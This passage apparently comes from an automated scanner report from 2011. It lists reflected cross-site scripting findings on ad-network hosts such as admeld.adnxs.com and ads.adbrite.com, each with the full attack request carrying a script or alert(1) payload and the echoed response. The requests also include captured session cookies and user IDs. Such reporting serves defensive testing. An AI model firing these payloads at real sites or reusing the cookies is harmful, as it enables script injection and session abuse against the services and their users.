UIybpHau0jzO5nZx7UNwc3Fcp5iybN6R1Y4JRoZKSSUbihELGr1XjgJM-yDn_T1Z38sLZJC5nnDEEYiCcbVkukitODRA_AYG_IAioGjDaP-ISMjhJsq43NtGC5w8alVd5Y3W_JVjsDeSQOTbDGWiFedYQaqonMCHOBdi8d64ncpkChEs1qKWeHlrhzJYvLK3U-X10T_mT9KtDivePIKJH6GNW46BRue32KEQLKx6RNT8qd-WiqVu80Hd_1P41FwUMGjlvQh8nhtp-zIq39ERDNVTK0IrUP-Cb_Ttx6GnOadl8nzAGhY8gq3gpxC6wpgzazfLsmMDzWYl67LQ1JPM8EK-GuiGbOzeZcMadWx6wDLtAMkQVPcBJeV_tSNAPqHn9Y96EEZ-kpDRlGoDOTjB8wgMtJHWp3U6FoQlEEosDOa2-6KjCjDtIMrxBp5mvurivaTyXBheiAjiFf5UzegIuH4PUQvF6HeYOl6yqVHlN2N9o11E9eoWE0gjO__pRMYYCNosyxH0ScxZ65NjJ8VJ6s08lUOlo3qTokJN5qzHBCHQVfE1b1R5wcKsxZf4LB5iPER8LvGXO1dAiOp7NxnU6D8mSvlFARj6k9vFL_PsqNx_NNxjUdgOuMKm6J5HDgs5y53qrZJyQVFecTwNKv5u9gz8eOfmncQzsT8YzywYTnISxIiHDXRREkq8K6_Cm8q7fOElewNe0FUGX0hxZNzX4RoxVeIITv1JR3M72AniQ6YsYfQmDHyNp520zI0HtJUF-yqs6-DDZsPbxj6Qgt5rFbggFIVrJR--A2xOt2l_LWMK7tcPGYKlDQExz7jt4XR4fyfzh6Y4d1vzmTMWcXBBW9Bwdgf7tDTwlHeQSy55kAD3G7t5jXWl2cilPuU73Pi5VvtGhRf1Bdy-tAzDWmiMKVJVbOcDmZ5ZA02huibYR0GLuxcJiSODuj1_GH4U3GxuALFLqSDArVvdqWPd1GH0CqEOJoyUsNRGCunARqHY1uoWs0abrh5VidSbzlvpfD9Bzedd0fQ1rNRAD_KliILsqERKBdpCSMMdrRB4h1pI33gcUO4C6n3gIrfyRotW5DbCfDxVHrK9OoZO1MqpMf-cD9MMeDxOsMI2HX50MkvGmhcZ7rIyyEizdkyd46QFUa8WEftR2_ranpFLDpnRWIPNGjFB85-AgYQqi3Ai0ozCyuE1PvWed1Li7rlJAMxp3uhubgLqqen5CtkmryYVTaYla4uKZOoFmK70-d6OBcdxR12uoDe_khu9L8pJ6cznlUJAYbKODyHPR4HRIlAmgaV3jBoguNFhCRsPc48rbhIrukdZcq88n7lUj82FDH58Lhzl730VWgqKvZ5Le44tUEYA8TMW7OkIBh4MsLAyfVn4fGgPUaaOfBE9jjuFfaqW11n4Z8gkLMTpxhxJkjDlSB7t0jcg9SXHexVCHumGFGU6YM9Q8y70R5LfL4BLNtWCdXTLJ8AtVcxNVvqy2ZcWAG-XpWNmIwppcdMqT-TkBX71JftijU2ptQWyE_WdHTddtiLy8MENw12owW6GlcHsm8bU3ZnaOAN1egW49z4weCLEpZILzTJU_ugwz8K5JhQ-DMDFzSxAh1-IGuEN7L1wERO08_NsneUMgmIOM-CdHdrVEKwYjsAqaPrkY0ib7YmiG6LPzAsOwDGEz0q517w5yTLXeP_QAGL2ktWSGsWvV5vNvimLfWzt63bDLkG5l0TfkVsb_CM3xVbtHIkji0PAVOv_qkrD2HBM43r-YwbWOT7PPhjZcBn; fc=xTIbWrtivElq1tUc5tWjJbVvdU6bSGa3te68hWgJRC-cCsKuP_sD1eNstKEGmgqs2CjyBHHN4B50paqel1-StJLdzlSJYnWgjgpSWPKJZqanh77CDv_Cb5k2sLKUWKhY0sNf3mqCcrIxbMgK0qZIglL8KhgM5_wQzjFfm742WtlsRj4DgPxbC0CSbEhxctH3CNlUYOl7xObpPSA_AkNKQIxazefuTbu8OVIWB1hgh0UuQ5WvHyA5163u2A0m1Vwyua7r46nuxletASYocQS1CQ; pf=iWpxAKbe6dXKyG4kI9LU0TQr6_aV_hWXTsEtRZOgJfGU4lRMcL7m1vqUsiBTZr7RMO7qqq5hFl3uSsnbrtm0AcdiicNNmmE_aI2n_-oR-aSbxFtxY6VXGMaWedmSR5_sZf2e9JPx2W0_L4Yfnte0zVeMKR4WkXgHWfiVoBwANMcKjySply9svk7Zjz1cpf4Bzb5Tt0dQE7jHQc5epS0VRkVIATW7cLC_dfDNtRc55AaPTS0-vn8aJUl_hlPyvPOOtdzUdOc0k8NWJBJOGBK9QZ-lyGHiRYTkQQvITxdIImFBY0mOsZX2h2BPTttOm1Xbc_h5HhDpjIQwIe1q44DX0AG9Q25Hr0TsSXGFhqkVSyhYOo9e-u-S9OqoU54oGyc4eKOevxUxpxyyPlhnEBc9g-hyXq1vQkw6vFA4jx6_C50EFNKdwIC6nJFecFHEvdhoGJRMajhWfp6v36qtQgLomoeO7STcnXJMYxdVzVjC-m3FgjKTWuNYEjtqCRtgViTecSMM7QYznF7B2nS665hlYvalAnAOTSVOdM3F_f9snK6TMaUUr7mVR5XLQhBYqSHioDxtZIA_eLx2S_pX-oLVM25XRL8B07irNS8qlr7ekd1rQ4U8f3BvpBt3a5uXz3WYV2KppMfhFPhtONNbwIev0vTu8RLoHZ9dIHokovwqrwnQOji_IKtCoOfkmPA2GXNZsyEfLkFse-VL4nLB3SN-v7t_hIXf4yquNhsR3qlOcolIxbr8CAsvJn7s9pVERGCv2XgylrDt9qGvfTGyLpv8A2Yde38jaUPKbpopJkL6ubTp98EvwAGJDQCxmpV8QykkAj4Q6BHLoyve-_dzLlVIAQ06eq6t9RXgewAoL0bGKZkTVz9HyqK6lzJ3KzNn4XmhjX4azvEIVOD1XypL8BZ0ZYO5D-OZkr4-zDlwdvTf-FzZ62NZ2vx0847xQd2HiPAVs-Npo0_YWtPEzUNCMo2pgn80M8Yib7rvW7WlT65pK2uB1RKuJg5FS_p7z-IismFNJmnxdDECCARlTTFrZxwoda_KzBssnjAUyi1EkYCCG0j3pThGfwq5Uq0-f6AalaoOF3KASDJInaJTcmELg2xEMdu-KSTPHDRv4T_9SdgFPrBSblm3JwjUk_JyuCwxhJUXK4jbld-yDkb4tl03dxtcWcjoFV_QwjIpyolfrSfHGfHNKI-XeEZ9qQdvn_DOZqfwEmMfhowJdCoCPDrXPF5h1_V_4ID4A02bJp1qiRkqtiXoxNNyV8n3Mw6XuEZmbbAY2KiuuMMPoqqkC11UJ3f0ilmAcq-IQaSbZrb-8189lloCC94FRBPLoiryHccxbJkdIF-ULo-MIaIFfBzk_4K1fDEHbIdULrPVeP4f9gjGzYpqhRCV1kZeWvR_-f0hYA8Lw75Zvr3cnox-DbW0vtRfJ-SLGp5Ew4CpDqVMcjykIV5WgKm8ByrHbLc1WRYSLLdTRJiHTibF2wHwHq4LSkiTl7JnHCAEbLHNUgk8FLdI5Y5GIzEH5KXeZO6VoSww8QwnzpHYjcfw3UjUUBIE5Dj73rTqmIT7eerZylEPy4vu97TRJwAWQNtkfqiEAfr4_0EU; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C4%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15093%7C15093%7C15093%7C15096%7C15085%7C15093%7C15088%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7Cundefined%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 29-Oct-2011 02:20:17 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 02:20:16 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=9099190985727552127&fpid=b6123"><script>alert(1)</script>730c7e9bf00&nu=n&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...
7.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dffab'-alert(1)-'addbfb1145 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:12:10 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:12:10 GMT
Content-Length: 182

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193dffab'-alert(1)-'addbfb1145&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
7.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed4bf'-alert(1)-'94e964e747d was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:13:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 02 May 2011 02:13:21 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matched4bf'-alert(1)-'94e964e747d?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');
7.11. http://ads.adbrite.com/adserver/vdi/682865 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5012f<script>alert(1)</script>20f68d8343f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:44 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/6828655012f<script>alert(1)</script>20f68d8343f
7.12. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload ff129<script>alert(1)</script>f0a7e8f2d2f was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/682865?d=null&r=ff129<script>alert(1)</script>f0a7e8f2d2f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:37:48 GMT
Server: XPEHb/1.0
Content-Length: 123

Unsupported URL: /adserver/vdi/ff129<script>alert(1)</script>f0a7e8f2d2fMTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
7.13. http://ads.adbrite.com/adserver/vdi/684339 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 698fa<script>alert(1)</script>fc949c569e7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"
Host: ads.adbrite.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:42:41 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/684339698fa<script>alert(1)</script>fc949c569e7
7.14. http://ads.adbrite.com/adserver/vdi/711384 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 537d5<script>alert(1)</script>eba3afc9f69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3A%2F%2Fa.triggit.com%2Fpxabcm%3Fabid%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:13:08 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/711384537d5<script>alert(1)</script>eba3afc9f69
7.15. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of the r request parameter is copied into the HTML document as plain text between tags. The payload 59a9c<script>alert(1)</script>a841d9665e9 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=59a9c<script>alert(1)</script>a841d9665e9 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response (redirected)

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Mon, 02 May 2011 02:06:50 GMT
Server: XPEHb/1.0
Content-Length: 120

Unsupported URL: /adserver/vdi/59a9c<script>alert(1)</script>a841d9665e9MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
7.16. http://ads.adbrite.com/adserver/vdi/762701 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52007<script>alert(1)</script>c5f391e0619 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/76270152007<script>alert(1)</script>c5f391e0619?d=978972DFA063000D2C0E7A380BFA1DEC HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; b="%3A%3A12ggb%2C6e73"; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@2@4dbe115c@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"

Response

